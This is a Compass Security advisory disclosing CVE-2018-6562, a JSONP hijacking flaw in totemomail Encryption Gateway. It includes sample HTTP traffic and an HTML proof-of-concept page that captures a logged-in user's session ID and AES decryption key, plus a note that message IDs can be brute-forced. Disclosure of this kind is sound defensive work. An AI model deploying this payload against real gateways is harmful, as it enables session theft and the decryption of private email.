Totemomail Encryption Gateway 6.0.0_Build_371 JSONP Hijacking

`################################################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
################################################################################  
#  
# Product: totemomail Encryption Gateway  
# Vendor: totemo AG  
# CSNC ID: CSNC-2018-002  
# CVE ID: CVE-2018-6562  
# Subject: JSONP hijacking  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Nicolas Heiniger <[email protected]>  
# Date: 14.05.2018  
#  
################################################################################  
  
Introduction:  
-------------  
The totemomail Encryption Gateway protects email communication with any external  
partner by encryption. It doesn't matter whether you exchange emails with  
technically savvy communication partners or with those who have neither an  
appropriate infrastructure nor the necessary know-how. The encryption gateway  
also makes it easy to securely send very large attachments.[1]  
  
Compass Security discovered a vulnerability in the process of decrypting  
a secure message sent to an external partner. This issue could lead to the  
user's session on the gateway being stolen. The encryption material for the  
encrypted email could also be stolen in the same way.  
  
  
Affected:  
---------  
Vulnerable:  
* 6.0.0_Build_371  
  
No other version was tested but is is likely that older versions are affected as  
well.  
  
  
Technical Description  
---------------------  
When sending an encrypted email to a recipient outside of the organization,  
totemomail Encryption Gateway sends a so-called Envelope Message that includes  
an HTML file with the encrypted content and JavaScript to get the key from the  
gateway to decrypt the content. The key material is provided by the gateway  
through a JSONP callback that must be either authenticated using the email and  
password in the POST request or with an existing session ID. An example is  
provided below:  
==========  
GET /responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey  
&messageId=160_1&callback=jsonpCallback&usermail=[CUT BY COMPASS]  
&password=[CUT BY COMPASS]&usermtan=&_=1515597892513 HTTP/1.1  
Host: [CUT BY COMPASS]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: JSESSIONID=EF8E33D6DAD75F0394381AB7084DEA2D;  
oam.Flash.RENDERMAP.TOKEN=uy9dqvc4a  
Connection: close  
==========  
  
The response contains the key material as well as the session ID:  
==========  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Content-Type: application/json;charset=UTF-8  
Content-Length: 206  
Date: Wed, 10 Jan 2018 15:26:17 GMT  
  
jsonpCallback({"iv": "AJD[CUT BY COMPASS]w==",  
"key": "OYP[CUT BY COMPASS]w=", "cipher": "AES\/CBC\/PKCS5Padding",  
"keyAlgo": "AES", "session": "EF8E33D6DAD75F0394381AB7084DEA2D"});  
==========  
  
The problem arises because the same request is accepted if a session already  
exists on the Encryption Gateway. In this case, the username and password are  
not required. This enables an attacker to create a malicious web page that will  
define a JavaScript function 'jsonpCallback' and insert a script tag with the  
source on the Encryption Gateway. This way, it is possible to retrieve the  
response in the callback if a logged in user visits the malicious page.  
  
An example of such a malicious page is given below, note that the user, password  
and mtan parameters are not required:  
==========  
<html>  
<head>  
<title>JSONP data and session stealing PoC</title>  
<script>  
function jsonpCallback(obj) {  
document.write('<p>Your data is:</p>');  
document.write('<code>' + JSON.stringify(obj) + '</code>')  
}  
</script>  
</head>  
<body>  
<h1>JSONP data and session stealing PoC</h1>  
<script src="https://[CUT BY COMPASS]/responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1"></script>  
</body>  
</html>  
==========  
  
The only issue one can run into, is to guess the message ID but as far as Compass  
was able to observe this is kept in a form XXX_YY where XXX is a 3-digits number  
and YY is a 1 or 2-digits number. This allows for a brute force attack even over  
the Internet.  
  
  
Workaround / Fix:  
-----------------  
Install an up to date version of totemomail Encryption Gateway.  
  
As a developer, JSONP callbacks should not include sensitive information. If  
they need to, the request must include an unpredictable element. In this case a  
possibility would be to require the email and the password of the user even if  
the session is open.  
  
  
Timeline:  
---------  
2018-05-14: Coordinated public disclosure date  
2018-04-XX: Release of fixed version 6.0_b567  
2018-02-13: Initial vendor response  
2018-02-09: Initial vendor notification  
2018-02-02: Assigned CVE-2018-6562  
2018-01-10: Discovery by Nicolas Heiniger  
  
  
References:  
-----------  
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption  
`